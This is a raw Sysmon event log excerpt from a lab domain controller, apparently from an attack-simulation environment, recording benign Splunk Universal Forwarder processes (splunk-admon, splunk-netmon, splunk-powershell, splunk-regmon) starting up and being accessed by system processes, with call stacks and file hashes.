Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031354Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.967{7901BC46-56CF-6008-1607-00000000A301}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031353Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.435{7901BC46-56CF-6008-1507-00000000A301}71647776C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031352Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.294{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-56CF-6008-1507-00000000A301}7164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031351Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.294{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031350Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.294{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031349Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.294{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031348Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.294{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031347Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.294{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-56CF-6008-1507-00000000A301}7164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031346Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.294{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-56CF-6008-1507-00000000A301}7164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031345Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:07.295{7901BC46-56CF-6008-1507-00000000A301}7164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031369Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:08.466{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-56D0-6008-1707-00000000A301}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031368Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:08.466{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031367Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:08.466{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031366Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:08.466{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031365Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:08.466{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031364Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:08.466{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-56D0-6008-1707-00000000A301}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031363Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:08.466{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-56D0-6008-1707-00000000A301}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031362Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:08.468{7901BC46-56D0-6008-1707-00000000A301}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031378Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:09.544{7901BC46-56D1-6008-1807-00000000A301}28527064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031377Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:09.404{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-56D1-6008-1807-00000000A301}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031376Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:09.404{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031375Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:09.404{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031374Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:09.404{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031373Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:09.404{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031372Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:09.404{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-56D1-6008-1807-00000000A301}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031371Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:09.404{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-56D1-6008-1807-00000000A301}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031370Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:09.405{7901BC46-56D1-6008-1807-00000000A301}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031396Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.904{7901BC46-56D2-6008-1A07-00000000A301}53686632C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031395Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.747{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-56D2-6008-1A07-00000000A301}5368C:\Program 